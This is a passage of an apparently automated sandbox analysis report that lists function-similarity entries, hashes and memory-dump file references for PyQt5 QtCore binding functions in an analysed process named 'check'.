                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Exp@@$CasePatternQt@@Sensitivity@String@@Syntax@0@@malloc
                                                                                                                                                                                                                • String ID: J1|EE
                                                                                                                                                                                                                • API String ID: 248156383-1252374362
                                                                                                                                                                                                                • Opcode ID: 2d5656a1790e92b20772223eefa423f28616ff2229890d2e57a031d5d646ed02
                                                                                                                                                                                                                • Instruction ID: f8fbde1090de76cf303ed18065e692b06d8f57d2863a7c1d5a352918425d3458
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d5656a1790e92b20772223eefa423f28616ff2229890d2e57a031d5d646ed02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6141F175A09B85C6E7A08F26F444B5A77A4FB88B84F144136DE8D53B68EF3CD454CB04
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClearDeallocErr_SubtypeType_
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 3120778283-2407233842
                                                                                                                                                                                                                • Opcode ID: 68ac5b22edb4578c47c296d18e88bf43c58a966ea34840cb92941ec4a760f5f5
                                                                                                                                                                                                                • Instruction ID: 9e93023c522c004e9379017becf799c5ee3b715423e08b05233b4f106169c0dd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68ac5b22edb4578c47c296d18e88bf43c58a966ea34840cb92941ec4a760f5f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 863118A6B09A4685DB418B2AF44462EA370FF89BD0F488136DE4E27768EF7CD481C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong
                                                                                                                                                                                                                • String ID: QVersionNumber$isNormalized$isNormalized(self) -> bool
                                                                                                                                                                                                                • API String ID: 2610644205-966780887
                                                                                                                                                                                                                • Opcode ID: 498db0101f25a0212eb62fcd4ba5f6442c7ecdce57a1afa11bf2917d0bb0546d
                                                                                                                                                                                                                • Instruction ID: 8f9473a42b837479d63bfea55593f25e20e378f5b708244377bce40c746a4ee5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 498db0101f25a0212eb62fcd4ba5f6442c7ecdce57a1afa11bf2917d0bb0546d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3431D2B6B18A4695EB00CF35D9889BC77A4FB84BC0B584036CE4E43760DF79E949C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Declaration@@FromLongNamespaceStreamV0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 33632974-2407233842
                                                                                                                                                                                                                • Opcode ID: 52fbd3a574b772690de0ba97c45ac42d27971d74b22e4e08f38ea3bff877272c
                                                                                                                                                                                                                • Instruction ID: db38508a7321cc5408834126e3858795e65b421c26181602c5bd06b6bd14ded5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52fbd3a574b772690de0ba97c45ac42d27971d74b22e4e08f38ea3bff877272c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41213CB6A09B9281EA408B66F44866AB774FB89BD4F184132DF8D13B69DF7DD0858700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Declaration@@EntityFromLongStreamV0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 948036025-2407233842
                                                                                                                                                                                                                • Opcode ID: 29bc3630286f3fde5e878f0d812edcb003a9277d4a6bcd851d25f3d78793716e
                                                                                                                                                                                                                • Instruction ID: cf3ecd7bfddb603df167b7302ca68a4b96564461e51ef9b9f7920eb6f0a467c6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29bc3630286f3fde5e878f0d812edcb003a9277d4a6bcd851d25f3d78793716e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5213EA6A09B42C1EB408B65F44466AB770FB88BD4F184132DE8D23B69DF7DD1858700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromIndex@@LongModelPersistentV0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 3364971739-2407233842
                                                                                                                                                                                                                • Opcode ID: da8077d0f30a8eab5629d58c22f5847f7aefc046b8084ea2f7b21856f67abc71
                                                                                                                                                                                                                • Instruction ID: f97920f475fa36b8dbb76e32282fb05270da8abd05efe2112c1bacc4589812fa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: da8077d0f30a8eab5629d58c22f5847f7aefc046b8084ea2f7b21856f67abc71
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A2131B5A09B4282EB418B66F45866AB374FB88F94F194032DE8D23B69DF7CD1458704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ??8?$Attribute@@@@Bool_FromLongStreamV0@@Vector@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 1025387815-2407233842
                                                                                                                                                                                                                • Opcode ID: fc2f7a578a2f2ad339f529a3f22bd78c412b1264e2b60022efb58edc75e1e7f4
                                                                                                                                                                                                                • Instruction ID: 764bde9e20891a2b218d7d9b79bef7e2b1810d7d6cc89f6e92a83d430cce777d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc2f7a578a2f2ad339f529a3f22bd78c412b1264e2b60022efb58edc75e1e7f4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 232130A6A09B9281EA408B25F444669B770FB89FD4F584032DF8D13B68DF7DD145C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?fileTime@QFileDevice@@QEBA?AVQDateTime@@W4FileTime@1@@Z.QT5CORE ref: 00007FFB02FF6390
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$?fileDateDevice@@Time@Time@1@@Time@@malloc
                                                                                                                                                                                                                • String ID: QFileDevice$fileTime$fileTime(self, time: QFileDevice.FileTime) -> QDateTime
                                                                                                                                                                                                                • API String ID: 2576538811-2947189998
                                                                                                                                                                                                                • Opcode ID: f656d903f6c27a0be72c770a1c58bff8bec4bba4f8aaee4295f056110dbd49e6
                                                                                                                                                                                                                • Instruction ID: ff5bcaf59ed7a3852fdb75a004e8a675519f57e62ecf8077ac45447cb0a47b35
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f656d903f6c27a0be72c770a1c58bff8bec4bba4f8aaee4295f056110dbd49e6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20115BB5A19E4681EB40DF25E84CBA933B4FB48B80F954032CA5D13720EF3DD449C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?chopped@QByteArray@@QEBA?AV1@H@Z.QT5CORE ref: 00007FFB0300C4B5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?chopped@Array@@Bytemalloc
                                                                                                                                                                                                                • String ID: QByteArray$chopped$chopped(self, len: int) -> QByteArray
                                                                                                                                                                                                                • API String ID: 2049905809-3631626421
                                                                                                                                                                                                                • Opcode ID: 2ee0f76fdf345c89db4c5189b42de413bfea474dfd1934adedbf381bedfb4cda
                                                                                                                                                                                                                • Instruction ID: e0f9bb3188c7c6b5ffd5a4878b33443fa7960be2b669b8a0e3823d81fe5ac838
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ee0f76fdf345c89db4c5189b42de413bfea474dfd1934adedbf381bedfb4cda
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11114FB5B15E4685EB40DF25D85CBA933A4FB48B80F964032CA5D13720DF3DD549C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?persistentIndexList@QAbstractItemModel@@IEBA?AV?$QList@VQModelIndex@@@@XZ.QT5CORE ref: 00007FFB02FF0370
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
